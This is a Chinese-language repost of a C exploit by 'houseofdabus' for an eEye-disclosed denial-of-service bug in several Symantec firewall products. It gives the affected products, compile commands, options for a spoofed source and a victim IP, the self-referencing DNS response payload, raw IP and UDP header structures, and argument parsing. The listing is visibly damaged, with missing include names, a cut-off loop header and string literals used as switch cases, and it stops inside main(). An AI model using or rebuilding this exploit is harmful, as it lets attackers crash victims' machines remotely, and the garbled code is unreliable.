
赛门铁克网络防火墙D.o.s攻击代码


eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击。

作者:论坛整理 来源:zdnet网络安全 2008年4月14日

关键字: 防火墙 防火墙技术 硬件防火墙


  名称:HOD-symantec-firewall-DoS-expl.c:
  版本:Version 0.1 coded by houseofdabus
  翻译:luoluo
  漏洞发现:www.eEye.com
  漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html
  
  * -------------------------------------------------------------------
  * 程序测试:
  * - Symantec Norton Personal Firewall 2004
  
  * 受影响产品:
  * - Symantec Norton Internet Security 2002
  * - Symantec Norton Internet Security 2003
  * - Symantec Norton Internet Security 2004
  * - Symantec Norton Internet Security Professional 2002
  * - Symantec Norton Internet Security Professional 2003
  * - Symantec Norton Internet Security Professional 2004
  * - Symantec Norton Personal Firewall 2002
  * - Symantec Norton Personal Firewall 2003
  * - Symantec Norton Personal Firewall 2004

  * - Symantec Client Firewall 5.01, 5.1.1

  * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)

  * - Symantec Norton AntiSpam 2004

  * -------------------------------------------------------------------

  * 说明:

  eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击。通过发送单个恶意 DNS(UDP 端口 53)响应包给存在漏洞的主机,攻击者可以使 Symantec 的 DNS 响应校验代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启才能恢复运行。

  * -------------------------------------------------------------------

  * 编译:

  * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib

  * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib

  * Linux: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall

  * -------------------------------------------------------------------

  * 命令行参数/说明:

  * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]

  * -fi:IP From (sender) IP address

  * -tp:int To (recipient) port number

  * -ti:IP To (recipient) IP address

  * -n:int Number of times to send message

  *

  */

  #ifdef _WIN32

  #pragma comment(lib,"ws2_32")

  #pragma pack(1)

  #define WIN32_LEAN_AND_MEAN

  #include

  #include /* IP_HDRINCL */

  #include

  #include

  #else

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #endif

  /*
   * Buffer sizing. MAX_PACKET is the size of the datagram buffer declared in
   * main(); MAX_MESSAGE is the size of the global strMessage payload buffer.
   * The 28-byte difference matches a 20-byte IP header plus an 8-byte UDP
   * header as declared by the structs later in this file.
   */
  #define MAX_MESSAGE 4068

  #define MAX_PACKET 4096

  /* Default source port assigned to iFromPort in ValidateArgs(). */
  #define DEFAULT_PORT 53

  /* Default for both the source and destination address in ValidateArgs(). */
  #define DEFAULT_IP "10.0.0.1"

  /* Default number of sends (dwCount). */
  #define DEFAULT_COUNT 1

  

  /*
   * FAR is a Windows-only pointer qualifier; define it as empty elsewhere so
   * the `FAR*` alias in the IP_HDR typedef still compiles.
   */
  #ifndef _WIN32

  # define FAR

  #endif

  

  /*
   * DNS response template; ValidateArgs() copies it (without the terminating
   * NUL) into strMessage.
   *
   * Per the field comments below it is a DNS header marked as a response with
   * one question and one answer, followed by a name that consists of a
   * compression pointer referring to itself.
   *
   * Defensive note: the advisory text on this page attributes the hang to
   * kernel-mode DNS response validation looping forever on such a name. Code
   * that follows DNS compression pointers should cap the number of jumps and
   * accept only pointers to an earlier offset; a response whose name pointer
   * targets its own offset is never well-formed and can be dropped and logged.
   *
   * NOTE(review): this copy of the listing was damaged in extraction; treat
   * the literal as illustrative rather than as exact wire bytes.
   */

  char dnsreply[] =

  "xc9x9c" /* Transaction ID */

  "x80x00" /* Flags (bit 15: response) */

  "x00x01" /* Number of questions */

  "x00x01" /* Number of answer RRs */

  "x00x00" /* Number of authority RRs */

  "x00x00" /* Number of additional RRs */

  "xC0x0C"; /* Compressed name pointer to itself */

  

  /*
   * IPv4 header without options, one member per header field in wire order.
   * The layout is 20 bytes when the compiler inserts no padding; note that
   * #pragma pack(1) is only applied in the _WIN32 branch at the top of the
   * file.
   * NOTE(review): assumes unsigned short is 16 bits and unsigned int is
   * 32 bits - confirm per target; fixed-width types would make this explicit.
   * The byte order of the multi-byte members is decided by the code that
   * fills them in, which is not part of this declaration.
   */

  typedef struct ip_hdr {

  unsigned char ip_verlen; /* IP version and header length, packed in one byte */

  unsigned char ip_tos; /* IP type of service */

  unsigned short ip_totallength; /* Total length */

  unsigned short ip_id; /* Unique identifier */

  unsigned short ip_offset; /* Fragment offset field */

  unsigned char ip_ttl; /* Time to live */

  unsigned char ip_protocol; /* Protocol */

  unsigned short ip_checksum; /* IP checksum */

  unsigned int ip_srcaddr; /* Source address */

  unsigned int ip_destaddr; /* Destination address */

  /* Aliases: the struct, a pointer to it, and a FAR pointer (FAR is empty outside Windows). */
  } IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

  

  /*
   * UDP header: four 16-bit fields, 8 bytes when unsigned short is 16 bits.
   * NOTE(review): the byte order of the members is decided by the code that
   * fills them in, which is not part of this declaration.
   */

  typedef struct udp_hdr {

  unsigned short src_portno; /* Source port number */

  unsigned short dst_portno; /* Destination port number */

  unsigned short udp_length; /* UDP packet length */

  unsigned short udp_checksum; /* UDP checksum (optional) */

  /* Aliases: the struct and a pointer to it. */
  } UDP_HDR, *PUDP_HDR;

  

  /*
   * File-scope configuration, written by ValidateArgs().
   * The two addresses hold inet_addr() results.
   * NOTE(review): unsigned long is wider than the 32-bit address value on
   * LP64 targets, while the header struct stores addresses in unsigned int -
   * confirm the narrowing at the point of use.
   */

  unsigned long dwToIP, // IP to send to

  dwFromIP; // IP to send from (spoof)

  unsigned short iToPort, // Port to send to

  iFromPort; // Port to send from (spoof)

  unsigned long dwCount; // Number of times to send

  // Payload buffer; ValidateArgs() fills its start from the dnsreply template.
  char strMessage[MAX_MESSAGE]; // Message to send

  

  /*
   * Print the command-line synopsis and option help to stdout, then
   * terminate the process with exit status 1. Never returns.
   *
   * progname: program name shown in the synopsis (normally argv[0]).
   */
  void
  usage(char *progname)
  {
      /* Fixed help lines, written verbatim after the synopsis. */
      static const char *const option_help[] = {
          " -fi:IP From (sender) IP address ",
          " -tp:int To (recipient) open UDP port number: ",
          " 137, 138, 445, 500(default) ",
          " -ti:IP To (recipient) IP address ",
          " -n:int Number of times ",
      };
      size_t idx;

      fputs("Usage: ", stdout);
      printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int] ", progname);

      for (idx = 0; idx < sizeof option_help / sizeof option_help[0]; idx++) {
          fputs(option_help[idx], stdout);
      }

      exit(1);
  }

  

  /*
   * Fill the file-scope globals from the command line.
   *
   * Defaults are assigned first: destination port 500, source port
   * DEFAULT_PORT, both addresses DEFAULT_IP, send count DEFAULT_COUNT, and the
   * dnsreply template copied (minus its terminating NUL) into strMessage.
   * Switches beginning with '-' or '/' then override them: fi: (source
   * address), tp: (destination port), ti: (destination address), n: (count).
   * An unrecognised switch calls usage(), which exits with status 1.
   * Arguments that do not start with a switch character are ignored.
   *
   * NOTE(review): this copy of the listing was damaged in extraction - the
   * loop header below is cut off and the switch labels appear as string
   * literals - so the function does not compile as shown.
   * NOTE(review): inet_addr() failures and atoi()/atol() parse errors are not
   * detected, and the atoi() result is narrowed to unsigned short without a
   * range check. tolower() is passed a plain char; cast to unsigned char
   * before calling ctype functions.
   */
  void

  ValidateArgs(int argc, char **argv)

  {

  int i;

  

  /* Defaults, used for anything the command line does not override. */
  iToPort = 500;

  iFromPort = DEFAULT_PORT;

  dwToIP = inet_addr(DEFAULT_IP);

  dwFromIP = inet_addr(DEFAULT_IP);

  dwCount = DEFAULT_COUNT;

  /* sizeof - 1 drops the string literal's terminating NUL from the payload. */
  memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

  

  /* NOTE(review): loop header is truncated in this copy of the listing. */
  for(i = 1; i

  if ((argv[i][0] == "-") || (argv[i][0] == "/")) {

  /* First letter after the switch character selects the option family. */
  switch (tolower(argv[i][1])) {

  case "f":

  switch (tolower(argv[i][2])) {

  case "i":

  /* Length check keeps &argv[i][4] inside the argument string. */
  if (strlen(argv[i]) > 4)

  dwFromIP = inet_addr(&argv[i][4]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  break;

  case "t":

  switch (tolower(argv[i][2])) {

  case "p":

  if (strlen(argv[i]) > 4)

  iToPort = atoi(&argv[i][4]);

  break;

  case "i":

  if (strlen(argv[i]) > 4)

  dwToIP = inet_addr(&argv[i][4]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  break;

  case "n":

  /* Value starts at index 3 here because the option name is one letter. */
  if (strlen(argv[i]) > 3)

  dwCount = atol(&argv[i][3]);

  break;

  default:

  usage(argv[0]);

  break;

  }

  }

  }

  return;

  }

  

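  /*
   * Compute the 16-bit one's-complement checksum of a buffer: sum the data
   * as 16-bit words, fold the carries back into the low 16 bits, and return
   * the complement of the result.
   *
   * buffer: start of the data, read as native-order 16-bit words.
   * size:   length of the data in bytes; zero or negative reads nothing.
   *
   * Returns the complemented 16-bit sum (0xffff for an empty buffer).
   */
  unsigned short
  checksum(unsigned short *buffer, int size)
  {
      unsigned long cksum = 0;

      /* Sum all complete 16-bit words. */
      while (size > 1) {
          cksum += *buffer++;
          size -= (int)sizeof(unsigned short);
      }

      /*
       * Exactly one byte left: treat it as the first byte of a zero-padded
       * 16-bit word so the result is the same on either byte order. Testing
       * for == 1 (not just non-zero) keeps a negative size from touching the
       * buffer at all.
       */
      if (size == 1) {
          unsigned short tail = 0;

          *(unsigned char *)&tail = *(unsigned char *)buffer;
          cksum += tail;
      }

      /*
       * Fold until no carry remains. A fixed two-step fold is not enough when
       * unsigned long is 64 bits and the buffer is large.
       */
      while (cksum >> 16) {
          cksum = (cksum >> 16) + (cksum & 0xffff);
      }

      return (unsigned short)(~cksum);
  }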

  

  

  

  

  int

  main(int argc, char **argv)

  {

  #ifdef _WIN32

  WSADATA wsd;

  #endif

  int s;

  #ifdef _WIN32

  BOOL bOpt;

  #else

  int bOpt;

  #endif

  struct sockaddr_in remote;

  IP_HDR ipHdr;

  UDP_HDR udpHdr;

  int ret;

  unsigned long i;

  unsigned short iTotalSize,

  iUdpSize,

  iUdpChecksumSize,

  iIPVersion,

  iIPSize,

  cksum = 0;

  char buf[MAX_PACKET],

  *ptr = NULL;

  #ifdef _WIN32

  IN_ADDR addr;

  #else

  struct sockaddr_in addr;

  #endif

  

  printf(" Symantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1 ");

  printf("Bug discoveried by eEye: ");

  printf("
